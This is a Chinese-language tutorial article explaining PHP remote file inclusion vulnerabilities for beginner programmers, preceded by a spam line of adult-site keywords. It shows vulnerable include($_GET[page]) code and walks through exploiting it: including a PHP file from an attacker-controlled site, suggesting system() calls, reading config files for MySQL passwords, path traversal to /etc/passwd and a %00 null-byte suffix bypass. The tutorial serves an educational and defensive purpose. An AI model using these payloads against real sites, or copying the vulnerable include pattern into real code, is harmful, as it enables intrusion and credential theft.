自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

探討PHP遠(yuǎn)程文件包含漏洞產(chǎn)生原因

開發(fā) 后端
我們?cè)谖恼轮邢虼蠹抑v解了有關(guān)PHP遠(yuǎn)程文件包含漏洞的原理,幫助大家了解PHP的安全性,在編程中實(shí)現(xiàn)代碼的可靠性。

對(duì)于初級(jí)PHP程序員來說,對(duì)于PHP的安全性還不能完全掌握。首先我們需要了解致使程序漏洞的原理。下面我們就來介紹一下PHP遠(yuǎn)程文件包含漏洞的產(chǎn)生原因。#t#

首先的問題是,什么才是”遠(yuǎn)程文件包含漏洞“?簡要的回答是服務(wù)器通過PHP的任意文件包含過濾不嚴(yán),從而去執(zhí)行一個(gè)惡意文件,這是個(gè)程序員過濾上的問題,請(qǐng)記住,所有的cgi程序都有這樣的bug。

1.找出PHP遠(yuǎn)程文件包含漏洞bug:

為了發(fā)現(xiàn)目標(biāo),我們首先要知道包含兩個(gè)字的含義,在所有語言里(大多數(shù))都有這種方法包含任意的文件。在PHP里,我們使用include()函數(shù),它的工作流程:

如果你在Main.PHP里包含include1.PHP,我將這樣寫include("include1.PHP").不是很科學(xué),但你要知道其中的道理。
我們先看這個(gè),當(dāng)用戶輸入通過后就包含文件,也就是

 

  1. if ($_GET[page]) {  
  2. include $_GET[page];  
  3. } else {  
  4. include "home.PHP";  

這種結(jié)構(gòu)在動(dòng)態(tài)網(wǎng)站里是常見的,問題是它允許這樣 [url]http://www.target.com/explame.PHP?page=main.PHP[/url] 或者[url]http://www.target.com/explame.PHP?page=downloads.PHP[/url]來查看。無論如何,如果你的程序里有這樣的bug也很悲哀了,只能怪你,盡管只是一句過濾的問題,但就是這一句過濾就有了Script hacker.在zone-h.org的調(diào)查里,文件包含的攻擊率占到9.4%,足夠我們引起重視,而且它也不是一兩天的問題,幾年前就有了,但到了今天,一批一批程序員依舊走老路重走,所以就有了這篇文章,在2004年寫這樣的文章已經(jīng)老掉牙,但我還是要寫,畢竟牢騷能讓人收益的時(shí)候就不叫牢騷了。

2.測試

這里有個(gè)遠(yuǎn)程文件包含的例子,目的只有一個(gè),為了你的程序安全,我們來看具體的

[url]http://www.target.com/explame.PHP?page=zizzy[/url]

Warning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.PHP on line 3
Warning: main(): Failed opening 'zizzy' for inclusion (include_path='.:/usr/local/lib/PHP') in /var/www/htdocs/index.PHP on line 3

PHP輸出的這些錯(cuò)誤信息告訴我們,程序去包含文件/var/www/htdocs/zizzy,但沒找到,看見了吧,No such file or directory沒這樣的文件,現(xiàn)在理解PHP遠(yuǎn)程文件包含漏洞了吧。

3.利用

PHP確實(shí)很好,可以遠(yuǎn)程調(diào)用文件,那我創(chuàng)建一個(gè)yeah.txt,放在我的站上[url]http://www.mysite.com/yeah.txt.[/url]內(nèi)容這樣

 

  1. < ?  
  2. echo "Wow,test!";  
  3. ?> 

那么[url]http://www.target.com/explame.PHP?pa...e.com/yeah.txt[/url]
OK,回顯Wow,test!,這樣就執(zhí)行了。讀取config.PHP也不難吧,里面放了mysql密碼啊。把yeah.txt寫成<? PHPinfo; ?>看看,寫成system()去試試,有什么感想,在過分點(diǎn),這樣提交page=../../../../../../../etc/passwd。知道什么叫真正的包含了吧。

4.另一種PHP遠(yuǎn)程文件包含漏洞的原理

有時(shí)程序員換種寫法,寫成這樣,限制了包含范圍

 

  1. if ($_GET[page]) {  
  2. include "$_GET[page].PHP";  
  3. } else {  
  4. include "home.PHP";  

我們提交[url]http://www.target.com/explame.PHP?pa...e.com/yeah.txt[/url]

Warning: main([url]http://www.mysite.com/yeah.txt.PHP[/url]): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.PHP on line 3

Warning: main(): Failed opening 'http://www.mysite.com/yeah.txt.PHP' for inclusion (include_path='.:/usr/local/lib/PHP') in /var/www/htdocs/explame.PHP on line 3

包含失敗了,限制了后綴名為PHP,那mysite.com的yeah.txt改為yeah.PHP,ok,照樣執(zhí)行了
那passwd怎么辦

Warning: main(../../../../../../../etc/passwd.PHP): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.PHP on line 3

Warning: main(): Failed opening '../../../../../../../etc/passwd.PHP' for inclusion (include_path='.:/usr/local/lib/PHP') in /var/www/htdocs/explame.PHP on line 3

在這里使用個(gè)NUL字符,也就是%00來跳過檢測

[url]http://www.target.com/explame.PHP?pa.../etc/passwd%00[/url]

看見了吧。

5.建議

包含文件時(shí)最好指定好包含哪一個(gè)文件,或者過濾好提交的的變量,這也就是這篇PHP遠(yuǎn)程文件包含漏洞文章的目的,不是寫給hacking的人看,而是寫給那些初涉程序員的人,這樣的文章網(wǎng)上很多,只要有人受益,也就達(dá)到目的了。

責(zé)任編輯:曹凱 來源: 百度博客
相關(guān)推薦

2011-04-13 17:28:21

2009-07-06 17:47:44

2012-04-12 16:05:50

2017-09-06 11:21:53

2015-04-16 11:01:44

混合云IT管理

2009-11-30 11:01:20

MySQL與PHP產(chǎn)生

2009-12-04 15:42:57

PHP文件緩存

2010-09-14 17:49:14

溢出漏洞

2015-04-02 16:26:39

漏洞檢測工具Kadimus

2009-12-10 15:00:20

PHP獲取checkb

2013-07-03 11:28:47

2009-11-23 14:32:55

Visual Stud

2014-08-22 09:08:23

遠(yuǎn)程控制木馬

2025-02-21 08:10:00

漏洞網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2021-11-08 07:26:36

Vailyn漏洞安全工具

2010-07-21 09:38:15

PHP緩存技術(shù)

2009-11-23 10:31:25

PHP使用JSON

2009-11-30 18:59:52

PHP數(shù)組排序

2009-11-30 15:58:13

PHP數(shù)學(xué)函數(shù)

2009-11-22 15:28:35

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)